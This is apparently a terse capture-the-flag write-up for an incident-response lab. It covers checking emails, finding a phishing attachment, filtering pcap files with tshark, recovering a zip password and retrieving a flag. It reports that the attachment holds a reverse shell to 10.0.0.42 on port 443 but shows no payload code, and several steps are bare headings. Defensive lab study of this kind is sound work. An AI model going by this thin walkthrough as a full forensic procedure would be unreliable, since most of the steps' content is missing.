Author: AMD
This is a writeup for ContAInment room.
CONNECT
Lets connect the workstation with ssh.
CHECK THE EMAILS
Lets analyze them by starting with the most recent one.
Lets look at the email.
FIND THE ATTACHMENT
Lets analyze it.
It contains reverse shell to 10.0.0.42 on port 443
FIND THE PCAP
Lets go to the incident date with “cd /home/o.deer/Documents/pcap_dumps/2025-06-17”
Lets run the code below to find the .pcap we need to analyze.
for file in /home/o.deer/Documents/pcap_dumps/2025-06-17/*.pcap; do
echo "Checking $file"
tshark -r "$file" -q -z follow,tcp,ascii,0
doneOnly /home/o.deer/Documents/pcap_dumps/2025-06-17/session_4444_dump.pcap has an output.
ANALYZE PCAP FILE
Let’s start with the recunstruction.
Lets read /home/o.deer/qwen-output/reassembled_data_dump.txt
Can this be the password of teh .zip file
UNZIP
GET THE FLAG
Lets look at the guide.
Lets use AI again.
